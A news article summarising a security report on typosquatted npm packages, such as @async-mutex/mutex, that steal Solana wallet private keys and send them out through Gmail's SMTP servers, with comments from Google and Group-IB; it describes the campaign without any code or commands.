A new cyber attack targeting Solana crypto wallets has been uncovered, with Gmail being exploited as a key part of the attack strategy.
According to a Socket Threat Research Team report published on January 8, 2025, hackers are using malicious npm packages to steal Solana private keys and funnel them through Gmail’s email system, making it difficult for security systems to detect the threat.
The attack works by intercepting private keys during wallet interactions and sending them through Gmail’s SMTP servers, which are typically trusted and often bypass firewalls or endpoint detection systems. This makes it easier for hackers to carry out their scheme without triggering alarms.
Gmail’s role in this attack is crucial, as it is a widely trusted platform. According to Kirill Boychenko, a threat intelligence analyst at Socket, the abuse of Gmail allows the attack to go undetected by many security systems that treat smtp.gmail.com as legitimate traffic.
Google Responds to the Threat
In response to the report, Google confirmed that they are aware of this type of attack. A spokesperson stated that Gmail accounts have protections in place to detect suspicious behavior like exfiltration and forwarding of data. If such activity is detected, users are prompted to reauthenticate to secure their accounts.
AI and Gmail-Driven Attacks
The report also highlights how AI-driven attacks are becoming more prevalent in cybercrime. Dmitry Volkov, CEO of Group-IB, explained that AI is being used to create more sophisticated scams, including phishing and malware attacks. AI-powered tools can even generate malicious code, making it easier for hackers to carry out large-scale attacks and bypass traditional defenses.
The malicious npm packages used in this attack were disguised as legitimate tools. One such package, @async-mutex/mutex, was a typosquatted version of a popular package with millions of downloads. The packages were designed to look harmless, but they contained malware that could steal private keys from users of Solana wallets.
Ongoing Risk and Mitigation
At the time of the report, the malicious packages were still available for download, though researchers have petitioned for their removal. The threat actors behind this campaign have also used GitHub repositories to lend legitimacy to the malware.
This attack highlights the risks involved with trusting email platforms like Gmail, especially when they are exploited by hackers to exfiltrate sensitive data. Users of Solana wallets and other cryptocurrency platforms are urged to stay vigilant and ensure their accounts are secure, as these types of attacks continue to evolve.
For more updates on the situation, stay tuned.
